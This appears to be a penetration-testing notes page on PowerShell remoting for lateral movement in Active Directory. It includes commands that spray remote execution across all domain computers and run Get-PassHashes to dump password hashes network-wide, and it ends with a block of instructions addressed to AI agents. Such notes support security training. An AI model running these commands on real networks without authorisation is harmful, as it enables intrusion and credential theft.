# Powershell Remoting Instead of having to connect to a workstation from outside of the network everytime in order to execute commands, if we are already in a Powershell session we can either start a new session in our target box or issue commands on the target remotely from the current session we are in. Executing commands in such a manner is less noisy of course. You can run scripts or local functions from your current workstation onto your target remotely. You can even issue commands to multiple targets in the network in one statement if you have the privileges to do so (Fan-Out Remoting). You may have to enable remoting (Enable-PSRemoting) on your workstation if PSRemoting is not enabled already, but you need Administrator privileges to do so. This works excellently in conjunction with Pass-the-Hash. Some of these commands will require PowerView. ### Storing Credentials into the Session * Method 1: Using the Get-Credential cmdlet from a remote desktop: ```powershell $creds = Get-Credential # then enter the password in the popup ``` * Method 2: Using the New-Object-Cmdlet ```powershell $user = '' $pwd = '' $secure_pwd = $pwd | ConvertTo-SecureString -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential -ArgumentList $user, $secure_pwd ``` ### Begin a New Session on Another Workstation ```powershell Enter-PSSession -ComputerName ``` ### Running a Stateful Session and Then Entering It ```powershell $sess = New-PSSession -ComputerName [-Credential $creds] Enter-PSSession -Session $sess ``` ### Executing Commands Remotely on Another Workstation ```powershell Invoke-Command -ComputerName -ScriptBlock {} Invoke-Command -Session $sess -ScriptBlock {} ``` ### Spraying Computers to See Where You Have Access ```powershell Invoke-Command -ScriptBlock {hostname;whoami} -Credential $cred -ComputerName (Get-NetComputer) ``` * My little script is a bit cleaner... ```powershell foreach ($comp in Get-NetComputer) { $comp + ' : ' + (Invoke-Command -ScriptBlock {whoami} -ComputerName $comp 2>$NUL) } ``` ### Executing Scripts Remotely ```powershell Invoke-Command -FilePath -ComputerName [-Credential $cred] ``` * You can spray this command onto other workstations at once as well... ```powershell Invoke-Command -FilePath -ComputerName (Get-NetComputer) ``` ### Execute Locally Loaded Functions on Remote Machines ```powershell # Using Get-PassHashes.ps1 from nishang as an example Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-NetComputer) [-ArgumentList ] [-Credential $cred] 2>$NUL ``` ### Copying Files Remotely ```powershell Copy-Item -ToSession $sess -Path C:\local\path\to\file -Destination C:\destination\path ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://csforza.gitbook.io/pentesting-articles-and-notes/windows/active-directory/powershell-remoting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.